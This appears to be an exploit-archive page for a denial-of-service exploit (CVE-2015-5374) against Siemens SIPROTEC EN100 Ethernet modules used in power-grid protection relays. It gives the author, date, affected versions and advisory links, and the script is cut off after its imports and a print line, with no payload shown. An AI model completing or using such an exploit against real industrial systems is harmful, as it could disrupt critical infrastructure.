Siemens siprotec 4 and siprotec compact en100 ethernet module < 4.25 denial of service Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-02-16 |
Type : dos |
Platform : hardware
This exploit / vulnerability Siemens siprotec 4 and siprotec compact en100 ethernet module < 4.25 denial of service is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
# Date: 14.02.2018
# Exploit Author: M. Can Kurnaz
# Contact: https://twitter.com/0x43414e
# Vendor Homepage: https://www.siemens.com
# Version: All devices that include the EN100 Ethernet module version V4.24 or prior.
# Tested on: Siemens SIPROTEC 4 (multiple versions < V4.25).
# CVE : CVE-2015-5374
# Vulnerability Details:
# https://www.cvedetails.com/cve/CVE-2015-5374/
# https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
#!/usr/bin/env python
import socket
import sys
print('CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service')